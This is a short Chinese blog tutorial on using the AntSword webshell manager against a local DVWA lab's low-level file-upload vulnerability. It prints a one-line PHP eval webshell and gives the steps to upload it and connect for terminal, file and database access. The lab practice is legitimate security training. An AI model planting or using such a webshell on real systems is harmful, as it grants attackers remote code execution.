首页 > 其他分享 >中国蚁剑使用

中国蚁剑使用

时间:2023-04-16 16:34:51浏览次数:31  
标签:文件 up dvwa low 使用 中国 php 上传

使用phpstudy搭建的dvwa靶场,测试文件上传漏洞 low级别。

1、准备php木马文件,命名为up.php

<?php
eval($_POST['abc']);
?>

2、phpstudy启动,dvwa登录,置为low级别

3、上传up.php

4、浏览器访问上传的php文件,未报404,说明访问成功

5、启动中国蚁剑exe,在主面板右键菜单栏选择添加数据。弹窗中配置连接信息

6、配置

其他设置

7、测试和添加

8、利用

虚拟终端:ret是子程序的返回指令执行本指令

文件管理:

数据操作:

 

标签:文件,up,dvwa,low,使用,中国,php,上传
From: https://www.cnblogs.com/wd404/p/17323489.html

相关文章

  • 使用命令方式,重新命名KVM虚拟机
    使用命令方式,重新命名KVM虚拟机。  1.使用virshlist--all命令查看所有的虚拟机 2.导出原有虚拟机的配置文件在导出配置之前关闭vm。$virshshutdownpc_vm94 virshdumpxml命令将原来的虚拟机配置导出成xml文件$virshdumpxmlpc_vm94>vm94.xml 3.修......
  • 消息队列常见的使用场景
    消息队列中间件是分布式系统中重要的组件,主要解决应用耦合,异步消息,流量削锋等问题实现高性能,高可用,可伸缩和最终一致性架构。最全面的Java面试网站使用较多的消息队列有RocketMQ,RabbitMQ,Kafka,ZeroMQ,MetaMQ以下介绍消息队列在实际应用中常用的使用场景。异步处理,应用解耦,流量......
  • burp介绍和使用
    1、介绍burpsuite,简称为burp,是基于java开发的针对web应用程序的攻击平台。官网:BurpSuite–ApplicationSecurityTestingSoftware–PortSwigger2、下载和安装分为pro版和community版,前者收费,后者免费。community版本无法使用pro的自动测试等功能,但大多数基础的功能还是......
  • PS新手教程-如何使用PS给人物照片牙齿美白
    如何使用PS给人物照片牙齿美白?给大家介绍如何使用PS给人物照片牙齿美白,一起来看看吧。1.打开PS,导入图片,复制图层,如下图2.选择可选颜色,调整黄色。3.调整白色4.将蒙板填充为黑色,如下图5.选择画笔,如下(你也可以根据自己的需要,调整参数)6.使用白色画笔,在牙齿出涂抹,如下图完成:以上就是如何......
  • #yyds干货盘点#使用socket.io实现多房间通信聊天室
    websocket的实现有很多种,像ws和socket.io,这里使用的是socket.io来实现多房间的效果。这里的使用没有使用socket.io官方提供的namespace和room,而是完全通过一个namespace实现的。数据传输使用JSON格式,封装了消息规范消息体规范constactionType={join:'JOIN',//加入leav......
  • k8s 使用kubeadm更新过期的证书
    kubeadmcerts命令仅支持v1.15及其以上的版本1、查看证书过期时间kubeadmcertscheck-expiration执行命令完后会详细显示k8s各个证书的过期时间2、当证书过期我们执行命令kubeadmalphacertsrenewall执行完后查看证书过期时间,发现证书已经续期一年3、修改更新后的admin.conf......
  • 在docker中运行的jenkins中使用docker时遇到错误
    每次服务器重启,在docker中运行的jenkins中使用docker时遇到以下错误time="2023-04-15T13:55:46Z"level=errormsg="failedtodialgRPC:cannotconnecttotheDockerdaemon.Is'dockerdaemon'runningonthishost?:dialunix/var/run/docker.sock:connect:p......
  • 运维监控必看:必懂的 InfluxDB 使用指南,关键时刻能用上
    1InfluxDB是什么InfluxDB是一个由InfluxData开发的开源时序型数据库。它由Go写成,着力于高性能地查询与存储时序型数据。InfluxDB被广泛应用于存储系统的监控数据,IoT行业的实时数据等场景。技术特点包括:InfluxDB在技术实现上充分利用了Go语言的特性,无需任何外部依赖即可独立......
  • 【逆向】使用x64dbg实现qq私聊与群消息防撤回
    由于qq是32位的所以需要用x32dbg调试,打开x32dbg。开启qq后打开想要用来测试的聊天窗口,因为这里首先进行私聊的防撤回,所以打开的是用户的聊天窗口。然后回到x32dbg,点击文件->附加,找到聊天窗口的进程,点击附加。附加后先到断点选项卡里禁用所有断点,然后在工具栏里找到调试,然后......
  • 使用stanza完成自然语言分析处理任务
    安装stanza直接使用pip命令即可安装stanzapackagepipinstallstanza构建管道stanza中的管道用于构建NLP任务的模型加载序列、文本处理序列。需要注意,当本地不存在指定的Processor模型时,Pipeline对象会执行一个自动下载程序,将模型下载到本地。Pipeline的初始化示例import......